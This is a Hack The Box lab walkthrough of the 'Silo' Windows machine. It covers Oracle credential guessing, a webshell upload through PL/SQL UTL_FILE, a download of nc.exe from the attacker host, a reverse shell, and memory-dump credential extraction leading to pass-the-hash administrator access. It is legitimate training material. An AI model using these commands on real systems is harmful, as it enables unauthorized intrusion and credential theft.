Silo

Back

Ports scan

u505@naos:~/HTB/Machines/Silo$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.82


Starting masscan 1.0.5 at 2021-01-24 15:50:02 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82

u505@naos:~/HTB/Machines/Silo$ nmap -sC -sV silo
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 10:50 EST
Nmap scan report for silo (10.10.10.82)
Host is up (0.15s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: 8m33s, deviation: 0s, median: 8m33s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-01-24T16:02:18
|_  start_date: 2021-01-24T15:51:17


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.75 seconds

Windows enumeration

The box is a Windows 2012 R2, and winrm is accessible.

u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82 -u u505 -p abc
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         10.10.10.82     445    SILO             [-] SILO\u505:abc STATUS_LOGON_FAILURE
u505@naos:~/HTB/Machines/Silo$ sudo crackmapexec winrm 10.10.10.82
WINRM       10.10.10.82     5985   NONE             [*] None (name:10.10.10.82) (domain:None)
WINRM       10.10.10.82     5985   NONE             [*] http://10.10.10.82:5985/wsman

Web enumeration

The web server serves the default IIS web page. Dirsearch doesn't find anything interresting.

u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,htm,html,aspx" -f -t 100 -u http://silo.htb
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "


  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )


Extensions: txt, htm, html, aspx | HTTP method: GET | Threads: 100 | Wordlist size: 27669


Error Log: /opt/utils/dirsearch/logs/errors-21-01-24_11-30-34.log


Target: http://silo.htb/


Output File: /opt/utils/dirsearch/reports/silo.htb/_21-01-24_11-30-35.txt


[11:30:35] Starting:
[11:30:45] 403 -    1KB - /aspnet_client/
[11:30:45] 301 -  153B  - /aspnet_client  ->  http://silo.htb/aspnet_client/


Task Completed

Oracle enumeration

With ODAT (Oracle database attack tool) we enumerate available SIDs. The default SID XE for Oracle express edition is found.

u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/odat/odat.py sidguesser -s 10.10.10.82 --sids-file /opt/utils/odat/sids.txt


[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                               #########################################################  | ETA:  00:00:00
[+] 'XEXDB' is a valid SID. Continue...
100% |########################################################################################################################| Time: 00:01:02
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |########################################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...                               ###################################                        | ETA:  00:00:06
100% |########################################################################################################################| Time: 00:00:55
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

With Odat again, we enumerate default users and password, and the scott/tigger is found.

u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/odat/odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file /opt/utils/odat/accounts/accounts.txt


[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do:                                                  | ETA:  00:03:08
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[+] Valid credentials found: scott/tiger. Continue...              ################                                           | ETA:  00:00:44
100% |########################################################################################################################| Time: 00:03:39
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger

Access database

We are able to access the oracle engine by Sqlplus as sysdba.

u505@naos:~/HTB/Machines/Silo$ sqlplus scott/tiger@10.10.10.82/XE as sysdba


SQL*Plus: Release 21.0.0.0.0 - Production on Sun Jan 24 14:54:26 2021
Version 21.1.0.0.0


Copyright (c) 1982, 2020, Oracle.  All rights reserved.




Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production


SQL> quit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

Upload file

Oracle engine runs with high privileges. We try to upload a file to the web server.

505@naos:~/HTB/Machines/Silo$ sqlplus scott/tiger@10.10.10.82/XE as sysdba


SQL*Plus: Release 21.0.0.0.0 - Production on Sun Jan 24 22:39:20 2021
Version 21.1.0.0.0


Copyright (c) 1982, 2020, Oracle.  All rights reserved.




Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production


SQL> CREATE OR REPLACE DIRECTORY CTEST AS 'C:\inetpub\wwwroot';


Directory created.


SQL> GRANT READ ON DIRECTORY CTEST TO PUBLIC;


Grant succeeded.


SQL> DECLARE
  out_File  UTL_FILE.FILE_TYPE;
BEGIN
  out_File := UTL_FILE.FOPEN('CTEST', 'u505.txt' , 'W');


  UTL_FILE.PUT_LINE(out_file , 'Hi u505!');
  UTL_FILE.PUT_LINE(out_file , 'Line2!');
  UTL_FILE.FCLOSE(out_file);
END;


  2    3    4    5    6    7    8    9   10   11
 12  /


PL/SQL procedure successfully completed.

The PL/SQl runs successfully. The file has been uploaded to the IIS.

u505@naos:~/HTB/Machines/Silo$ curl http://10.10.10.82/u505.txt
Hi u505!
Line2!

An alternative could be to use the automatic tool odat to upload a file.

Upload webshell

Knowing that we can upload files to IIS, we upload an aspx webshell.

u505@naos:~/HTB/Machines/Silo$ cp /usr/share/webshells/aspx/cmdasp.aspx ./

We modify the file with PL/SQL instructions.

u505@naos:~/HTB/Machines/Silo$ cp cmdaspx.sql cmdasp.aspx.sql
u505@naos:~/HTB/Machines/Silo$ vi cmdasp.aspx.sql
u505@naos:~/HTB/Machines/Silo$ cat cmdasp.aspx.sql
DECLARE
  out_File  UTL_FILE.FILE_TYPE;
BEGIN
  out_File := UTL_FILE.FOPEN('CTEST', 'cmd.aspx' , 'W');
UTL_FILE.PUT_LINE(out_file , '<%@ Page Language="C#" Debug="true" Trace="false" %>');
UTL_FILE.PUT_LINE(out_file , '<%@ Import Namespace="System.Diagnostics" %>');
UTL_FILE.PUT_LINE(out_file , '<%@ Import Namespace="System.IO" %>');
...
UTL_FILE.PUT_LINE(out_file , '</form>');
UTL_FILE.PUT_LINE(out_file , '</body>');
UTL_FILE.PUT_LINE(out_file , '</HTML>');
UTL_FILE.FCLOSE(out_file);
END;

We run the PL/SQL on sqlplus.

SQL>  @cmdasp.aspx.sql
46  /


PL/SQL procedure successfully completed.

We obtain the webshell if we browse the URL.

With code execution.

Reverse shell

u505@naos:~/HTB/Machines/Silo$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We copy nc.exe to our web folder and start a python web server.

u505@naos:~/HTB/Machines/Silo/web$ cp /opt/utils/nc.exe/nc.exe ./
u505@naos:~/HTB/Machines/Silo/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

Upload the nc executable to the target.

powershell -c "Invoke-WebRequest -Uri http://10.10.14.11/nc.exe -OutFile C:\temp\nc.exe"

u505@naos:~/HTB/Machines/Silo/web$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.82 - - [25/Jan/2021 11:33:07] "GET /nc.exe HTTP/1.1" 200 -

Call nc to open the reverse shell.

c:\temp\nc.exe 10.10.14.11 4444 -e cmd

u505@naos:~/HTB/Machines/Silo$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.82.
Ncat: Connection from 10.10.10.82:49164.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


c:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool

User flag

c:\Users\Phineas\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D


 Directory of c:\Users\Phineas\Desktop


01/07/2018  02:03 PM    <DIR>          .
01/07/2018  02:03 PM    <DIR>          ..
01/05/2018  10:56 PM               300 Oracle issue.txt
01/04/2018  09:41 PM                32 user.txt
               2 File(s)            332 bytes
               2 Dir(s)  15,471,681,536 bytes free


c:\Users\Phineas\Desktop> type user.txt
type user.txt
<USER_FLAG>

There is a file Oracle issue.txt that seems interesting.

Privileges escalation

c:\Users\Phineas\Desktop> type "Oracle issue.txt"
type "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):


Dropbox link provided to vendor (and password under separate cover).


Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0


link password:
▒%Hm8646uC$

There is a link and a password, but the first character not readable.

Get a copy of Oracle file

Start of smb server.

u505@naos:~/HTB/Machines/Silo/web$ sudo python3 /opt/utils/impacket/examples/smbserver.py -username u505 -password u505 u505 ./ -smb2support
[sudo] password for u505:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation


[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Map the network share on the target.

c:\Users\Phineas\Desktop> net use x: \\10.10.14.11\u505 /USER:u505 u505
net use x: \\10.10.14.11\u505 /USER:u505 u505
The command completed successfully.

Copy the file toour local machine.

c:\Users\Phineas\Desktop> copy "Oracle issue.txt" X:\
copy "Oracle issue.txt" X:\
        1 file(s) copied.

Check the character encoding of the file.

u505@naos:~/HTB/Machines/Silo$ cp web/Oracle\ issue.txt ./


u505@naos:~/HTB/Machines/Silo$ file Oracle\ issue.txt
Oracle issue.txt: ISO-8859 text, with CRLF line terminators

The file is encoded in latin charset, we convert the file to UTF-8, and the password is readable.

u505@naos:~/HTB/Machines/Silo$ iconv -f ISO-8859-15 -t UTF-8 Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):


Dropbox link provided to vendor (and password under separate cover).


Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0


link password:
£%Hm8646uC$

Download dump

The zip file contents a dmp file pf 1GB.

u505@naos:~/HTB/Machines/Silo$ file web/SILO-20180105-221806.dmp
web/SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages

The file is a Windows blue death screen memory dump.

Root flag with administrator credential hashes

With the forensic tool volatility, the SAM hashes are available.

u505@naos:~/HTB/Machines/Silo/web$ python /opt/utils/volatility3/vol.py -f SILO-20180105-221806.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0
Progress:  100.00               PDB scanning finished
User    rid     lmhash  nthash


Administrator   500     aad3b435b51404eeaad3b435b51404ee        9e730375b7cbcebf74ae46481e07b0c7
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002    aad3b435b51404eeaad3b435b51404ee        8eacdd67b77749e65d3b3d5c110b0969

We can log as administrator with evil-winrm or psexec.

u505@naos:~/HTB/Machines/Silo$ evil-winrm -i 10.10.10.82 -u administrator -H 9e730375b7cbcebf74ae46481e07b0c7


Evil-WinRM shell v2.3


Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
<ROOT_FLAG>
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit


Info: Exiting with code 0

Alternative root flag with administrator password

In the dump LSA (Local Security Authority) there is a password in the DefaultPassword entry.

u505@naos:~/HTB/Machines/Silo/web$ python /opt/utils/volatility3/vol.py -f SILO-20180105-221806.dmp windows.lsadump.Lsadump
Volatility 3 Framework 2.0.0
Progress:  100.00               PDB scanning finished
Key     Secret  Hex


DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM    ,Ï%�14�®C-��¬ò§tmC¨¦©Bb÷UpH»}�þyI½      2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00

We test it to check if the password is the administrator password.

u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82 -u administrator -p 'DoNotH@ckMeBro!'
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         10.10.10.82     445    SILO             [+] SILO\administrator:DoNotH@ckMeBro! (Pwn3d!)

Access as administrator.

u505@naos:~/HTB/Machines/Silo$ evil-winrm -i 10.10.10.82 -u administrator -p 'DoNotH@ckMeBro!'


Evil-WinRM shell v2.3


Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
silo\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit


Info: Exiting with code 0

References

• How to convert ISO8859-15 to UTF8?

Daniel Simao 10:24, 25 January 2021 (EST)